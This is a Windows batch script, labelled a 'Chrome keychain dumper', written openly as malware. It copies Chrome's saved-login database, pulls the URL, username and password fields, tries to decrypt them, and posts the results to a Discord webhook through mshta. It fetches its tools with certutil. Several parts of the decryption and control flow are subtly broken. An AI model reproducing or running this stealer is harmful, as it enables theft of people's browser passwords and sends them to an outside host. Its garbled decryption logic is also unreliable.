Chrome keychain dumper (windows LOLbin edition)

@echo off
setlocal EnableDelayedExpansion

set TEMP_DB=%USERPROFILE%\Loginvault.db
set CHROME_USER_DATA_PATH=%USERPROFILE%\AppData\Local\Google\Chrome\User Data
set LOCAL_STATE_PATH=%CHROME_USER_DATA_PATH%\Local State
set LOGIN_DATA_PATH=%CHROME_USER_DATA_PATH%\Default\Login Data
set WEBHOOK_URL=https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

for %%i in (sqlite3 curl) do (
    where %%i >nul 2>nul
    if errorlevel 1 (
        echo %%i is required but not installed. Attempting to download...
        call :download_%%i
    )
)

:download_sqlite3
certutil -urlcache -split -f "https://sqlite.org/2023/sqlite-tools-win32-x86-3410200.zip" "%TEMP%\sqlite-tools.zip"
powershell -Command "Expand-Archive -Path '%TEMP%\sqlite-tools.zip' -DestinationPath 'C:\sqlite3'"
set PATH=%PATH%;C:\sqlite3
exit /b 0

:download_curl
certutil -urlcache -split -f "https://curl.se/windows/dl-7.83.1_2/curl-7.83.1_2-win64-mingw.zip" "%TEMP%\curl.zip"
powershell -Command "Expand-Archive -Path '%TEMP%\curl.zip' -DestinationPath 'C:\curl'"
set PATH=%PATH%;C:\curl\bin
exit /b 0

:get_master_key
if not exist "%LOCAL_STATE_PATH%" (
    echo The 'Local State' file does not exist.
    exit /b 1
)

for /f "tokens=*" %%i in ('type "%LOCAL_STATE_PATH%" ^| findstr /i "encrypted_key"') do (
    set "encrypted_key=%%i"
)

set "encrypted_key=!encrypted_key:encrypted_key"":=!"
set "encrypted_key=!encrypted_key:,=!"
set "encrypted_key=!encrypted_key:~0,-2!"
set "encrypted_key=!encrypted_key:5!"

for /f "tokens=*" %%i in ('powershell -command "[System.Convert]::FromBase64String('%encrypted_key%') | Set-Content -Encoding Byte -Path tempkey.bin"') do echo %%i
for /f "tokens=*" %%i in ('powershell -command "[System.IO.File]::ReadAllBytes('tempkey.bin') | Protect-CmsMessage -To 'localmachine' | ConvertTo-Base64String"') do (
    set "master_key=%%i"
)

del tempkey.bin
goto :eof

:decrypt_password
setlocal
set "encrypted_password=%1"
set "master_key=%2"

set "iv=!encrypted_password:~3,12!"
set "payload=!encrypted_password:~15!"

for /f "tokens=*" %%i in ('powershell -command "[System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect([System.Convert]::FromBase64String('%payload%'), $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine))"') do (
    set "decrypted_password=%%i"
)

echo !decrypted_password!
endlocal & set "decrypted_password=%decrypted_password%"
goto :eof

:retrieve_chrome_passwords
setlocal
set "temp_db_file=%1"
set "master_key=%2"
set "decrypted_info="

if not exist "%temp_db_file%" (
    echo Temporary database file does not exist.
    exit /b 1
)

for /f "tokens=1,2,3 delims=|" %%i in ('sqlite3 "%temp_db_file%" "SELECT action_url, username_value, password_value FROM logins"') do (
    call :decrypt_password "%%~3" "%master_key%"
    set "decrypted_info=!decrypted_info!URL: %%~1\nUser Name: %%~2\nPassword: !decrypted_password!\n**************************************************\n"
)

endlocal & set "decrypted_info=%decrypted_info%"
goto :eof

:send_to_discord_webhook
setlocal
set "data=%1"
set "webhook_url=%2"

mshta vbscript:Execute("CreateObject(""MSXML2.XMLHTTP"").Open ""POST"", """%webhook_url%"", False: CreateObject(""MSXML2.XMLHTTP"").setRequestHeader ""Content-Type"", ""application/json"": CreateObject(""MSXML2.XMLHTTP"").send ""{""content"":""%data%""}"": close")
goto :eof

call :get_master_key

if errorlevel 1 (
    exit /b 1
)

if not exist "%LOGIN_DATA_PATH%" (
    echo Chrome login data SQLite database does not exist.
    exit /b 1
)

copy "%LOGIN_DATA_PATH%" "%TEMP_DB%"
call :retrieve_chrome_passwords "%TEMP_DB%" "%master_key%"
set "data_to_upload=%decrypted_info%"
del "%TEMP_DB%"

call :send_to_discord_webhook "%data_to_upload%" "%WEBHOOK_URL%"